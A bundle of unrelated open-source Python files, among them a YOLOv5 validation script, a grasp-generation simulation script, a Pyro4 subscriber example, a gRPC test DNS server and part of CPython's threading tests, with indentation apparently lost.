s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1, t2 = 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t_ = time_sync()
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t = time_sync()
t0 += t - t_
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
t1 += time_sync() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
t2 += time_sync() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(img[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.on_val_image_end(pred, predn, path, names, img[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t2)) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.on_val_end()
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser(prog='val.py')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='datasets.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class datasets')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default='runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
opt.data = check_file(opt.data) # check file
return opt
def main(opt):
set_logging()
print(colorstr('val: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_requirements(requirements=FILE.parent / 'requirements.txt', exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
run(**vars(opt))
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
generate_grasp.py
|
import warnings
warnings.filterwarnings("ignore")
import operator
import numpy as np
import sys,os,glob,re,time,copy,trimesh,gzip
code_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append("{}/../".format(code_dir))
import pickle
from dexnet.grasping.gripper import RobotGripper
from dexnet.grasping.grasp_sampler import PointConeGraspSampler
import dexnet
from autolab_core import YamlConfig
import os,my_cpp
import multiprocessing
import matplotlib.pyplot as plt
from Utils import *
from multiprocessing import Pool
import multiprocessing
from multiprocessing import Process, Manager
from functools import partial
from itertools import repeat
try:
multiprocessing.set_start_method('spawn')
except:
pass
from pybullet_env.env import Env
from pybullet_env.env_grasp import *
from pybullet_env.utils_pybullet import *
def compute_grasp_score_worker(grasps,ob_dir,gripper,id,d,debug):
if debug:
gui = True
else:
gui = False
env = EnvGrasp(gripper,gui=gui)
env.add_obj(ob_dir,concave=True)
p.changeDynamics(env.ob_id,-1,lateralFriction=0.7,spinningFriction=0.7,mass=0.1,collisionMargin=0.0001)
p.setGravity(0,0,-10)
for i_grasp in range(len(grasps)):
if i_grasp%max(1,(len(grasps)//100))==0:
print("compute_grasp_score_worker {}/{}".format(i_grasp,len(grasps)))
grasp_pose = grasps[i_grasp].get_grasp_pose_matrix()
grasps[i_grasp].perturbation_score = env.compute_perturbation_score(grasp_pose,trials=50)
del env
d[id] = grasps
def generate_grasp_one_object_balanced_score_from_complete_grasp(obj_dir):
with gzip.open(obj_dir.replace('.obj','_complete_grasp.pkl'),'rb') as ff:
grasps = pickle.load(ff)
grasp_amount_per_bin = 1000
grasp_score_bins = cfg_grasp['classes']
n_grasp_score_bins = len(grasp_score_bins)-1
n_grasps_per_bin = np.zeros((n_grasp_score_bins),dtype=int)
grasp_bins = {}
for i_bin in range(0,n_grasp_score_bins):
grasp_bins[i_bin] = []
for grasp in grasps:
score = grasp.perturbation_score
score_bin = np.digitize(score,grasp_score_bins) - 1
grasp_bins[score_bin].append(grasp)
for i_bin in grasp_bins.keys():
grasp_bins[i_bin] = np.array(grasp_bins[i_bin])
grasp_bins[i_bin] = np.random.choice(grasp_bins[i_bin],size=min(grasp_amount_per_bin,len(grasp_bins[i_bin])),replace=False)
good_grasp = []
for i_bin,grasps in grasp_bins.items():
good_grasp += list(grasps)
print("#grasp={}".format(len(good_grasp)))
out_file = obj_dir.replace('.obj','_grasp_balanced_score.pkl')
with gzip.open(out_file, 'wb') as f:
pickle.dump(good_grasp, f)
def generate_grasp_one_object_complete_space(obj_dir):
ags = PointConeGraspSampler(gripper,cfg_grasp)
out_file = obj_dir.replace('.obj','_complete_grasp.pkl')
mesh = trimesh.load(obj_dir)
pts,face_ids = trimesh.sample.sample_surface_even(mesh,count=10000,radius=0.001)
normals = mesh.face_normals[face_ids]
pcd = toOpen3dCloud(pts,normals=normals)
max_xyz = pts.max(axis=0)
min_xyz = pts.min(axis=0)
diameter = np.linalg.norm(max_xyz-min_xyz)
pcd = pcd.voxel_down_sample(voxel_size=diameter/10.0)
points_for_sample = np.asarray(pcd.points).copy()
normals_for_sample = np.asarray(pcd.normals).copy()
grasps = ags.sample_grasps(background_pts=np.ones((1,3))*99999,points_for_sample=points_for_sample,normals_for_sample=normals_for_sample,num_grasps=np.inf,max_num_samples=np.inf,n_sphere_dir=30,approach_step=0.005,ee_in_grasp=np.eye(4),cam_in_world=np.eye(4),upper=np.ones((7))*999,lower=-np.ones((7))*999,open_gripper_collision_pts=np.ones((1,3))*999999,center_ob_between_gripper=True,filter_ik=False,filter_approach_dir_face_camera=False,adjust_collision_pose=False)
# grasps = [ParallelJawPtGrasp3D(grasp_pose=np.eye(4))]*20
print(f'Evaluating #grasps={len(grasps)}')
if debug:
N_CPU = 1
else:
N_CPU = multiprocessing.cpu_count()
grasps_split = np.array_split(grasps,N_CPU)
manager = mp.Manager()
d = manager.dict()
workers = []
for i in range(N_CPU):
p = mp.Process(target=compute_grasp_score_worker, args=(grasps_split[i],obj_dir,gripper,i,d,debug))
workers.append(p)
p.start()
grasps = []
for i in range(N_CPU):
workers[i].join()
grasps += list(d[i])
print(f"Saving #grasps={len(grasps)} to {out_file}")
with gzip.open(out_file, 'wb') as f:
pickle.dump(grasps, f)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--class_name',type=str,default='nut')
parser.add_argument('--debug',type=int,default=0)
args = parser.parse_args()
code_dir = os.path.dirname(os.path.realpath(__file__))
with open('{}/config.yml'.format(code_dir),'r') as ff:
cfg = yaml.safe_load(ff)
class_name = args.class_name
debug = args.debug
cfg_grasp = YamlConfig("{}/config_grasp.yml".format(code_dir))
gripper = RobotGripper.load(gripper_dir=cfg_grasp['gripper_dir'][class_name])
names = cfg['dataset'][class_name]['train']
obj_dirs = []
code_dir = os.path.dirname(os.path.realpath(__file__))
for name in names:
obj_dirs.append(f'{code_dir}/data/object_models/{name}')
print("obj_dirs:\n",'\n'.join(obj_dirs))
for obj_dir in obj_dirs:
print('obj_dir',obj_dir)
generate_grasp_one_object_complete_space(obj_dir)
generate_grasp_one_object_balanced_score_from_complete_grasp(obj_dir)
|
manytopics_subscriber.py
|
"""
This is the subscriber for the 'many topics' messages example.
For code with more explanations, see the regular 'weather' message example code.
"""
from __future__ import print_function
import os
import time
import threading
import Pyro4
from operator import itemgetter
from messagebus.messagebus import Subscriber
Pyro4.config.AUTOPROXY = True
@Pyro4.expose
class Subber(Subscriber):
def init_counters(self, topics):
self.message_counter = {}
self.last_message = {}
for t in topics:
self.message_counter[t] = 0
self.last_message[t] = None
def consume_message(self, topic, message):
self.message_counter[topic] += 1
self.last_message[topic] = message
def clear_screen():
os.system(['clear', 'cls'][os.name == 'nt'])
subber = Subber()
d = Pyro4.Daemon()
d.register(subber)
daemon_thread = threading.Thread(target=d.requestLoop)
daemon_thread.daemon = True
daemon_thread.start()
# mass subscribe to all available topics
topics = list(sorted(subber.bus.topics()))
subber.init_counters(topics)
for t in topics:
subber.bus.subscribe(t, subber)
# show a table of the active topics on the bus
while True:
clear_screen()
print(time.ctime(), "-- active topics on the messagebus:")
print("{:20} : {:5} {} {}".format("topic", "count", "last_recv", "last message data"))
for topic, count in sorted(subber.message_counter.items(), key=itemgetter(1), reverse=True):
msg = subber.last_message[topic]
if msg:
print("{:20} : {:5d} - {} {!r:.20}".format(topic, count, msg.created.time(), msg.data))
else:
print("{:20} : {:5d}".format(topic, count))
print("(restart me to refresh the list of topics)")
time.sleep(1)
|
dns_server.py
|
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starts a local DNS server for use in tests"""
import argparse
import sys
import yaml
import signal
import os
import threading
import time
import twisted
import twisted.internet
import twisted.internet.reactor
import twisted.internet.threads
import twisted.internet.defer
import twisted.internet.protocol
import twisted.names
import twisted.names.client
import twisted.names.dns
import twisted.names.server
from twisted.names import client, server, common, authority, dns
import argparse
import platform
_SERVER_HEALTH_CHECK_RECORD_NAME = 'health-check-local-dns-server-is-alive.resolver-tests.grpctestingexp' # missing end '.' for twisted syntax
_SERVER_HEALTH_CHECK_RECORD_DATA = '123.123.123.123'
class NoFileAuthority(authority.FileAuthority):
def __init__(self, soa, records):
# skip FileAuthority
common.ResolverBase.__init__(self)
self.soa = soa
self.records = records
def start_local_dns_server(args):
all_records = {}
def _push_record(name, r):
print('pushing record: |%s|' % name)
if all_records.get(name) is not None:
all_records[name].append(r)
return
all_records[name] = [r]
def _maybe_split_up_txt_data(name, txt_data, r_ttl):
start = 0
txt_data_list = []
while len(txt_data[start:]) > 0:
next_read = len(txt_data[start:])
if next_read > 255:
next_read = 255
txt_data_list.append(txt_data[start:start+next_read])
start += next_read
_push_record(name, dns.Record_TXT(*txt_data_list, ttl=r_ttl))
with open(args.records_config_path) as config:
test_records_config = yaml.load(config)
common_zone_name = test_records_config['resolver_tests_common_zone_name']
for group in test_records_config['resolver_component_tests']:
for name in group['records'].keys():
for record in group['records'][name]:
r_type = record['type']
r_data = record['data']
r_ttl = int(record['TTL'])
record_full_name = '%s.%s' % (name, common_zone_name)
assert record_full_name[-1] == '.'
record_full_name = record_full_name[:-1]
if r_type == 'A':
_push_record(record_full_name, dns.Record_A(r_data, ttl=r_ttl))
if r_type == 'AAAA':
_push_record(record_full_name, dns.Record_AAAA(r_data, ttl=r_ttl))
if r_type == 'SRV':
p, w, port, target = r_data.split(' ')
p = int(p)
w = int(w)
port = int(port)
target_full_name = '%s.%s' % (target, common_zone_name)
r_data = '%s %s %s %s' % (p, w, port, target_full_name)
_push_record(record_full_name, dns.Record_SRV(p, w, port, target_full_name, ttl=r_ttl))
if r_type == 'TXT':
_maybe_split_up_txt_data(record_full_name, r_data, r_ttl)
# Add an optional IPv4 record is specified
if args.add_a_record:
extra_host, extra_host_ipv4 = args.add_a_record.split(':')
_push_record(extra_host, dns.Record_A(extra_host_ipv4, ttl=0))
# Server health check record
_push_record(_SERVER_HEALTH_CHECK_RECORD_NAME, dns.Record_A(_SERVER_HEALTH_CHECK_RECORD_DATA, ttl=0))
soa_record = dns.Record_SOA(mname = common_zone_name)
test_domain_com = NoFileAuthority(
soa = (common_zone_name, soa_record),
records = all_records,
)
server = twisted.names.server.DNSServerFactory(
authorities=[test_domain_com], verbose=2)
server.noisy = 2
twisted.internet.reactor.listenTCP(args.port, server)
dns_proto = twisted.names.dns.DNSDatagramProtocol(server)
dns_proto.noisy = 2
twisted.internet.reactor.listenUDP(args.port, dns_proto)
print('starting local dns server on 127.0.0.1:%s' % args.port)
print('starting twisted.internet.reactor')
twisted.internet.reactor.suggestThreadPoolSize(1)
twisted.internet.reactor.run()
def _quit_on_signal(signum, _frame):
print('Received SIGNAL %d. Quitting with exit code 0' % signum)
twisted.internet.reactor.stop()
sys.stdout.flush()
sys.exit(0)
def flush_stdout_loop():
num_timeouts_so_far = 0
sleep_time = 1
# Prevent zombies. Tests that use this server are short-lived.
max_timeouts = 60 * 10
while num_timeouts_so_far < max_timeouts:
sys.stdout.flush()
time.sleep(sleep_time)
num_timeouts_so_far += 1
print('Process timeout reached, or cancelled. Exitting 0.')
os.kill(os.getpid(), signal.SIGTERM)
def main():
argp = argparse.ArgumentParser(description='Local DNS Server for resolver tests')
argp.add_argument('-p', '--port', default=None, type=int,
help='Port for DNS server to listen on for TCP and UDP.')
argp.add_argument('-r', '--records_config_path', default=None, type=str,
help=('Directory of resolver_test_record_groups.yaml file. '
'Defaults to path needed when the test is invoked as part '
'of run_tests.py.'))
argp.add_argument('--add_a_record', default=None, type=str,
help=('Add an A record via the command line. Useful for when we '
'need to serve a one-off A record that is under a '
'different domain then the rest the records configured in '
'--records_config_path (which all need to be under the '
'same domain). Format: <name>:<ipv4 address>'))
args = argp.parse_args()
signal.signal(signal.SIGTERM, _quit_on_signal)
signal.signal(signal.SIGINT, _quit_on_signal)
output_flush_thread = threading.Thread(target=flush_stdout_loop)
output_flush_thread.setDaemon(True)
output_flush_thread.start()
start_local_dns_server(args)
if __name__ == '__main__':
main()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import threading_helper, requires_subprocess
from test.support import verbose, cpython_only, os_helper
from test.support.import_helper import import_module
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
import traceback
from unittest import mock
from test import lock_tests
from test import support
threading_helper.requires_working_threading(module=True)
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# Is Python built with Py_DEBUG macro defined?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def restore_default_excepthook(testcase):
testcase.addCleanup(setattr, threading, 'excepthook', threading.excepthook)
threading.excepthook = threading.__excepthook__
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = threading_helper.threading_setup()
def tearDown(self):
threading_helper.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
@cpython_only
def test_name(self):
def func(): pass
thread = threading.Thread(name="myname1")
self.assertEqual(thread.name, "myname1")
# Convert int name to str
thread = threading.Thread(name=123)
self.assertEqual(thread.name, "123")
# target name is ignored if name is specified
thread = threading.Thread(target=func, name="myname2")
self.assertEqual(thread.name, "myname2")
with mock.patch.object(threading, '_counter', return_value=2):
thread = threading.Thread(name="")
self.assertEqual(thread.name, "Thread-2")
with mock.patch.object(threading, '_counter', return_value=3):
thread = threading.Thread()
self.assertEqual(thread.name, "Thread-3")
with mock.patch.object(threading, '_counter', return_value=5):
thread = threading.Thread(target=func)
self.assertEqual(thread.name, "Thread-5 (func)")
def test_args_argument(self):
# bpo-45735: Using list or tuple as *args* in constructor could
# achieve the same effect.
num_list = [1]
num_tuple = (1,)
str_list = ["str"]
str_tuple = ("str",)
list_in_tuple = ([1],)
tuple_in_list = [(1,)]
test_cases = (
(num_list, lambda arg: self.assertEqual(arg, 1)),
(num_tuple, lambda arg: self.assertEqual(arg, 1)),
(str_list, lambda arg: self.assertEqual(arg, "str")),
(str_tuple, lambda arg: self.assertEqual(arg, "str")),
(list_in_tuple, lambda arg: self.assertEqual(arg, [1])),
(tuple_in_list, lambda arg: self.assertEqual(arg, (1,)))
)
for args, target in test_cases:
with self.subTest(target=target, args=args):
t = threading.Thread(target=target, args=args)
t.start()
@cpython_only
def test_disallow_instantiation(self):
# Ensure that the type disallows instantiation (bpo-43916)
lock = threading.Lock()
test.support.check_disallow_instantiation(self, type(lock))
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.current_thread().ident)
def f():
ident.append(threading.current_thread().ident)
done.set()
done = threading.Event()
ident = []
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
